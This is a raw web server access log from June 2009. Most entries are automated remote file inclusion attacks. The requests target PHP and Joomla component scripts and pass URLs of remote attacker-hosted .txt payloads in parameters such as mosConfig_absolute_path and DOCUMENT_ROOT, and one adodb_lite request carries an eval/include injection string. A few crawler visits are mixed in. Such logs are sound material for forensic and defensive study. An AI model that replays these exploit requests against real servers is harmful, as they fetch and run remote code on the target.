216.75.60.116 - - [27/Jun/2009:02:54:56 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:54:56 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:54:56 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:54:56 -0500] "GET /logs/access_log.1237680000//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:54:56 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:54:57 -0500] "GET /logs/access_log.1236297600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:02:54:58 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:02:54:58 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:02:54:58 -0500] "GET /?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:02:55:00 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:02:55:01 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:02:55:01 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:02:55:01 -0500] "GET /logs/access_log.1239667200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.202.81.179 - - [27/Jun/2009:02:55:01 -0500] "GET /logs/access_log.1237248000//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voyageurscowansville.com/img/copyright.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
216.75.60.116 - - [27/Jun/2009:02:55:03 -0500] "GET /logs/access_log.1236297600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:02:57:43 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:02:57:43 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:02:57:44 -0500] "GET /?DOCUMENT_ROOT=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:02:57:46 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
66.249.68.42 - - [27/Jun/2009:03:00:46 -0500] "GET /?M=A HTTP/1.1" 200 3245 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
74.53.70.114 - - [27/Jun/2009:03:01:06 -0500] "GET /?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:01:06 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:01:08 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:03:03:24 -0500] "GET /logs/access_log.1239148800/?custompluginfile%5B%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 298 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:03:03:24 -0500] "GET /?custompluginfile%5B%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 200 3233 "-""Mozilla/5.0"
65.55.106.148 - - [27/Jun/2009:03:03:24 -0500] "GET /logs/access_log.1146700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.243 - - [27/Jun/2009:03:03:57 -0500] "GET /logs/access_log.1190937600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
60.43.229.5 - - [27/Jun/2009:03:04:01 -0500] "GET /logs/?custompluginfile%5B%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 200 36699 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:04:44 -0500] "GET /?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:04:45 -0500] "GET /logs/access_log.1231113600/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:04:45 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:04:50 -0500] "GET /logs/access_log.1239062400/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:05:47 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:05:47 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:05:47 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:06:38 -0500] "GET /config.php?path_to_root=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:06:38 -0500] "GET /logs/config.php?path_to_root=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:06:38 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:07:03 -0500] "GET /logs/access_log.1240358400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:08:19 -0500] "GET /logs/access_log.1233619200/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.53.70.114 - - [27/Jun/2009:03:09:38 -0500] "GET /logs/access_log.1241395200/?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:12:25 -0500] "GET /logs/main.php?x=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:12:25 -0500] "GET /logs/access_log.1240185600/main.php?x=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:12:25 -0500] "GET /main.php?x=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:12:29 -0500] "GET /logs/access_log.1239667200/main.php?x=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:12:48 -0500] "GET /logs/access_log.1241049600/main.php?x=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.249.68.42 - - [27/Jun/2009:03:13:55 -0500] "GET / HTTP/1.1" 200 3245 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [27/Jun/2009:03:18:29 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 307 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
85.17.162.28 - - [27/Jun/2009:03:18:29 -0500] "GET /logs/access_log.1239408000//newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 334 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
85.17.162.28 - - [27/Jun/2009:03:18:29 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 312 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
85.17.162.28 - - [27/Jun/2009:03:18:46 -0500] "GET /logs/access_log.1239753600//newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 334 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
85.17.162.28 - - [27/Jun/2009:03:21:18 -0500] "GET /logs/access_log.1239408000//newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.17.162.28 - - [27/Jun/2009:03:21:18 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.17.162.28 - - [27/Jun/2009:03:21:18 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.17.162.28 - - [27/Jun/2009:03:21:28 -0500] "GET /logs/access_log.1239753600//newspublish/include.php?path%5Bdocroot%5D=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
60.43.229.5 - - [27/Jun/2009:03:23:31 -0500] "GET //skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:03:23:31 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 305 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:03:23:31 -0500] "GET /logs/access_log.1237507200//skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 327 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:03:23:43 -0500] "GET /logs/access_log.1233187200//skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 327 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:03:27:41 -0500] "GET /logs/access_log.1241654400//skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 327 "-""Mozilla/5.0"
60.43.229.5 - - [27/Jun/2009:03:27:41 -0500] "GET /logs/access_log.1236556800//skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 327 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:28:58 -0500] "GET /logs/access_log.1241308800//themes/container.php?theme_directory=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:28:58 -0500] "GET /logs//themes/container.php?theme_directory=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:29:00 -0500] "GET //themes/container.php?theme_directory=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:03:29:05 -0500] "GET /logs/access_log.1241395200//themes/container.php?theme_directory=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.106.173 - - [27/Jun/2009:03:29:55 -0500] "GET /logs/access_log.1167696000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [27/Jun/2009:03:30:59 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:03:30:59 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:03:31:00 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:03:31:00 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
201.232.54.48 - - [27/Jun/2009:03:32:32 -0500] "GET /logs/access_log.1241308800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://polombuo.ucoz.com/id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.147 - - [27/Jun/2009:03:41:55 -0500] "GET /logs/access_log.1107129600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.1.96.154 - - [27/Jun/2009:03:43:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
173.1.96.154 - - [27/Jun/2009:03:43:09 -0500] "GET //skin/zero_vote/error.php?dir=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:03:43:45 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:03:43:45 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.43.195.120 - - [27/Jun/2009:03:44:40 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:03:44:40 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:03:44:43 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:03:44:55 -0500] "GET //bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:03:44:55 -0500] "GET /logs/access_log.1230940800//bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:03:44:58 -0500] "GET /logs//bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:03:45:02 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:03:45:47 -0500] "GET /logs/access_log.1237248000//bbs/outlogin.php?_zb_path=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.106.179.130 - - [27/Jun/2009:03:47:01 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.98.209.71 - - [27/Jun/2009:03:47:11 -0500] "GET //include/new-visitor.inc.php?lvc_include_dir=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:03:47:11 -0500] "GET /logs//include/new-visitor.inc.php?lvc_include_dir=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:03:47:11 -0500] "GET //include/new-visitor.inc.php?lvc_include_dir=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:03:47:11 -0500] "GET /logs//include/new-visitor.inc.php?lvc_include_dir=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
87.106.179.130 - - [27/Jun/2009:03:47:40 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.189.18.73 - - [27/Jun/2009:03:48:32 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:03:48:32 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:03:48:32 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
87.106.179.130 - - [27/Jun/2009:03:49:34 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:03:49:34 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:03:49:38 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.179.130 - - [27/Jun/2009:03:49:38 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
210.188.236.212 - - [27/Jun/2009:03:50:20 -0500] "GET /logs/access_log.1239494400/joomla/index.php?option=com_restaurante&task=http://189.42.60.57/soul/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.188.236.212 - - [27/Jun/2009:03:50:21 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://189.42.60.57/soul/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
210.188.236.212 - - [27/Jun/2009:03:50:21 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://189.42.60.57/soul/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.188.236.212 - - [27/Jun/2009:03:50:24 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://189.42.60.57/soul/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
209.51.131.210 - - [27/Jun/2009:03:52:42 -0500] "GET /logs/access_log.1229126400////appserv/errors.php?error=http://indiedocs.com/forum/language/lang_english/lang_faq?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
209.51.131.210 - - [27/Jun/2009:03:52:42 -0500] "GET ////appserv/errors.php?error=http://indiedocs.com/forum/language/lang_english/lang_faq?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
209.51.131.210 - - [27/Jun/2009:03:52:42 -0500] "GET /logs////appserv/errors.php?error=http://indiedocs.com/forum/language/lang_english/lang_faq?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.51.131.210 - - [27/Jun/2009:03:52:42 -0500] "GET /logs/access_log.1225843200////appserv/errors.php?error=http://indiedocs.com/forum/language/lang_english/lang_faq?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.106.179.130 - - [27/Jun/2009:03:52:55 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
125.131.116.12 - - [27/Jun/2009:03:53:20 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:21 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:21 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:38 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:40 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:40 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:41 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:41 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:43 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:47 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:47 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:53:49 -0500] "GET /logs/access_log.1240704000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.51.131.210 - - [27/Jun/2009:03:54:22 -0500] "GET /logs/access_log.1228694400%20%20////appserv/errors.php?error=http://indiedocs.com/forum/language/lang_english/lang_faq?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:03:55:03 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.106.179.130 - - [27/Jun/2009:03:55:06 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.sancalogero.net/portal/upload/drivid.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
